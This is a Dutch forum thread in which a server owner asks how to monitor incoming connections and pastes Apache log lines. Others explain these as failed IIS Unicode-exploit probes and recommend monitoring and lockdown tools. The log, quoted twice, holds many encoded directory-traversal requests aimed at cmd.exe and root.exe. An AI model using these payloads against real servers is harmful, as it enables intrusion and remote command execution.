Is er een mogelijkheid om alle inkomende connecties te 'loggen' of te laten zien op het scherm? Ik bedoel dus ALLE computers die (vanaf internet) een verbinding leggen met mijn server. Of dit nu dmv. m'n apache of ftp is, dat maakt niet uit.
Wat dacht u van de ingebouwde logfuncties van Apache, FTP server etc.?
9000Wp o/w SolarEdge SE6K - Panasonic 5kW bi-bloc - gasloos sinds 17-7-2023
Ja, die ken ik, maar bestaat er geen programmaatje die mij realtime de openstaande verbindingen laten zien? Die log-files ken ik wel...blackd schreef op 03 February 2003 @ 19:21:
Wat dacht u van de ingebouwde logfuncties van Apache, FTP server etc.?
Ik krijg namelijk de volgende regels te zien in m'n apache-log:
(sorry voor de layout).
Wat is dit? Wie is dit? En wat doet hij/zij?
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| 216.177.25.76 - - [03/Feb/2003:02:47:28 +0100] "GET / HTTP/1.1" 200 134 213.51.77.246 - - [03/Feb/2003:03:44:46 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 295 213.51.77.246 - - [03/Feb/2003:03:44:48 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 293 213.51.77.246 - - [03/Feb/2003:03:44:49 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 213.51.77.246 - - [03/Feb/2003:03:44:51 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 213.51.77.246 - - [03/Feb/2003:03:44:53 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 213.51.77.246 - - [03/Feb/2003:03:44:55 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 213.51.77.246 - - [03/Feb/2003:03:44:57 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 213.51.77.246 - - [03/Feb/2003:03:44:59 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 213.51.77.246 - - [03/Feb/2003:03:45:01 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 213.51.77.246 - - [03/Feb/2003:03:45:03 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 213.51.77.246 - - [03/Feb/2003:03:45:05 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 213.51.77.246 - - [03/Feb/2003:03:45:07 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 213.51.77.246 - - [03/Feb/2003:03:45:08 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 300 213.51.77.246 - - [03/Feb/2003:03:45:10 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 300 213.51.77.246 - - [03/Feb/2003:03:45:12 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 213.51.77.246 - - [03/Feb/2003:03:45:13 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 213.51.77.246 - - [03/Feb/2003:05:12:10 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 295 213.51.77.246 - - [03/Feb/2003:05:12:11 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 293 213.51.77.246 - - [03/Feb/2003:05:12:12 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 213.51.77.246 - - [03/Feb/2003:05:12:13 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 213.51.77.246 - - [03/Feb/2003:05:12:15 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 213.51.77.246 - - [03/Feb/2003:05:12:16 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 213.51.77.246 - - [03/Feb/2003:05:12:17 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 213.51.77.246 - - [03/Feb/2003:05:12:19 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 |
(sorry voor de layout).
Wat is dit? Wie is dit? En wat doet hij/zij?
Zie [rml]blackd in "[ Windows 2000 server] Alle inkomende con"[/rml] - een of andere worm probeert toegang te krijgen tot je systeem. Wat niet lukt, dus er is weinig aan de hand 
Zie ook klik: en dus bijv. Wat zijn dit voor logs?
Maar je 'echte' vraag is dus of het kwaad kan / wat het doet?
Zie ook klik: en dus bijv. Wat zijn dit voor logs?
Maar je 'echte' vraag is dus of het kwaad kan / wat het doet?
'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)
Nou, ik zou dus graag een programmaatje op de desktop zetten dat mij precies vertelt wat de openstaande verbindingen zijn.
kent apache's log onder windows geen tail optie?Verwijderd schreef op 03 februari 2003 @ 20:16:
Nou, ik zou dus graag een programmaatje op de desktop zetten dat mij precies vertelt wat de openstaande verbindingen zijn.
ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device
Hmm.. wat is een 'tail'-optie?BackSlash32 schreef op 03 februari 2003 @ 23:44:
[...]
kent apache's log onder windows geen tail optie?
Verwijderd
Dit zie ik ook heel vaak in mijn IIS logs. Iemand die probeert m'n C: directory op te vragen. Schrijf IP op en geef dit met de logfile aan je provider. Heb ik eens gedaan en die persoon nooit meer gezien. IP bestond paar weken later niet eens meerVerwijderd schreef op 03 February 2003 @ 19:29:
Ik krijg namelijk de volgende regels te zien in m'n apache-log:
code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 216.177.25.76 - - [03/Feb/2003:02:47:28 +0100] "GET / HTTP/1.1" 200 134 213.51.77.246 - - [03/Feb/2003:03:44:46 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 295 213.51.77.246 - - [03/Feb/2003:03:44:48 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 293 213.51.77.246 - - [03/Feb/2003:03:44:49 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 213.51.77.246 - - [03/Feb/2003:03:44:51 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 213.51.77.246 - - [03/Feb/2003:03:44:53 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 213.51.77.246 - - [03/Feb/2003:03:44:55 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 213.51.77.246 - - [03/Feb/2003:03:44:57 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 213.51.77.246 - - [03/Feb/2003:03:44:59 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 213.51.77.246 - - [03/Feb/2003:03:45:01 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 213.51.77.246 - - [03/Feb/2003:03:45:03 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 213.51.77.246 - - [03/Feb/2003:03:45:05 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 213.51.77.246 - - [03/Feb/2003:03:45:07 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 213.51.77.246 - - [03/Feb/2003:03:45:08 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 300 213.51.77.246 - - [03/Feb/2003:03:45:10 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 300 213.51.77.246 - - [03/Feb/2003:03:45:12 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 213.51.77.246 - - [03/Feb/2003:03:45:13 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 213.51.77.246 - - [03/Feb/2003:05:12:10 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 295 213.51.77.246 - - [03/Feb/2003:05:12:11 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 293 213.51.77.246 - - [03/Feb/2003:05:12:12 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 213.51.77.246 - - [03/Feb/2003:05:12:13 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 213.51.77.246 - - [03/Feb/2003:05:12:15 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 213.51.77.246 - - [03/Feb/2003:05:12:16 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 213.51.77.246 - - [03/Feb/2003:05:12:17 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334 213.51.77.246 - - [03/Feb/2003:05:12:19 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350
(sorry voor de layout).
Wat is dit? Wie is dit? En wat doet hij/zij?
Tail is een Unix tool waarmee je bijvoorbeeld de laatste regles van een log constant op je scherm kunt krijgen.... Heel handig.....En die is er wel voor Windows, zoek maar eens met google o.i.d. op "tail for windows"....
Probleem is denk ik eerder (ik weet niet in hoeverre dat ook voor Apache for Windows geld) dat veel van die logs gecached worden en slecht eens in de zoveel tijd weggeschreven. Tail heeft dan denk ik niet echt veel nut......
[ Voor 38% gewijzigd door Stormtrooper op 04-02-2003 11:45 . Reden: aanvulling ]
Stormtroopers toys: Asus Strix 16, Samsung S24 Ultra, HP Z4 G4.
Verwijderd
Wat jij zoekt is: Active PortsVerwijderd schreef op 03 February 2003 @ 20:16:
Nou, ik zou dus graag een programmaatje op de desktop zetten dat mij precies vertelt wat de openstaande verbindingen zijn.
Download hier: http://www.protect-me.com/freeware.html
Je schopt dan ook een topic van 2 jaar oud; dus mogelijk bestond die applicatie toen nog niet
---
Prozium - The great nepenthe. Opiate of our masses. Glue of our great society. Salve and salvation, it has delivered us from pathos, from sorrow, the deepest chasms of melancholy and hate
Ik heb tcpview binaries van 2001 liggen dus het bestond toen al
ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device
Die regels zijn om IIS te exploiten waardoor men toegang kan krijgen tot je server en uiteindelijk em kunnen hacken op een of andere manier. Ze maken hierbij gebruik van IIS Unicode-exploits, maar ik kan je gerust stellen dat als je geen IIS draait of in ieder geval zorgt dat als je wel IIS draait dat je je boel gepatcht en goed geconfigureerd hebt er helemaal niets aan de hand is. Die regels worden hoogst waarschijnlijk gegenereerd door een of andere scantool.
Jouw oplossing werkt dus ook: IIS uitzetten en Apache gebruiken
Don't worry dus en stuur het IP inderdaad naar de betreffende provider met de melding dat het betreffende IP hacking-attempts op je server aan het doen was.
Edit:
IIS tip: IIS Lockdown
http://www.microsoft.com/...urity/tools/locktool.mspx
Jouw oplossing werkt dus ook: IIS uitzetten en Apache gebruiken
Don't worry dus en stuur het IP inderdaad naar de betreffende provider met de melding dat het betreffende IP hacking-attempts op je server aan het doen was.
Edit:
IIS tip: IIS Lockdown
http://www.microsoft.com/...urity/tools/locktool.mspx
[ Voor 7% gewijzigd door Clueless op 19-12-2005 00:34 ]
I Don't Know, So Don't Shoot Me
Voordat je reageert wil het nog wel eens schelen naar de datum te kijken.
Dat voorkomt dat je met oplossingen komt voor een probleem wat na dik 2 jaar waarschijnlijk niet eens meer aan de orde is
Dat voorkomt dat je met oplossingen komt voor een probleem wat na dik 2 jaar waarschijnlijk niet eens meer aan de orde is
ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device
Pagina: 1